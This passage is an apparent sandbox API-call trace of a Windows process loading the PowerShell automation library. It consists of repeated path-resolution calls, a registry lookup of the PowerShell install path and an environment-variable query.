	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
	[0228.047] GetCurrentProcessId () returned 0x728
	[0228.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.047] GetLastError () returned 0xcb
	[0228.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.047] GetLastError () returned 0xcb
	[0228.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.047] GetLastError () returned 0xcb
	[0228.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.048] GetLastError () returned 0xcb
	[0228.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.048] GetLastError () returned 0xcb
	[0228.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.048] GetLastError () returned 0xcb
	[0228.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.049] GetLastError () returned 0xcb
	[0228.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.050] GetLastError () returned 0xcb
	[0228.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.050] GetLastError () returned 0xcb
	[0228.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.050] GetLastError () returned 0xcb
	[0228.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.050] GetLastError () returned 0xcb
	[0228.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.050] GetLastError () returned 0xcb
	[0228.050] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaebbc | out: phkResult=0xaebbc*=0x3ac) returned 0x0
	[0228.051] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaec04, lpData=0x0, lpcbData=0xaec00*=0x0 | out: lpType=0xaec04*=0x1, lpData=0x0, lpcbData=0xaec00*=0x56) returned 0x0
	[0228.051] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaec04, lpData=0x3582a0, lpcbData=0xaec00*=0x56 | out: lpType=0xaec04*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaec00*=0x56) returned 0x0
	[0228.052] RegCloseKey (hKey=0x3ac) returned 0x0
	[0228.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.052] GetLastError () returned 0xcb
	[0228.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.052] GetLastError () returned 0xcb
	[0228.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.052] GetLastError () returned 0xcb
	[0228.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.053] GetLastError () returned 0xcb
	[0228.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.053] GetLastError () returned 0xcb
	[0228.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.053] GetLastError () returned 0xcb
	[0228.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.068] GetLastError () returned 0xcb
	[0228.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.069] GetLastError () returned 0xcb
	[0228.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.069] GetLastError () returned 0xcb
	[0228.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.069] GetLastError () returned 0xcb
	[0228.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.070] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.071] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.071] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.071] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.071] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.071] GetLastError () returned 0xcb
	[0228.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.072] GetLastError () returned 0xcb
	[0228.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.214] GetLastError () returned 0xcb
	[0228.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.214] GetLastError () returned 0xcb
	[0228.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.214] GetLastError () returned 0xcb
	[0228.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.214] GetLastError () returned 0xcb
	[0228.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.214] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.215] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
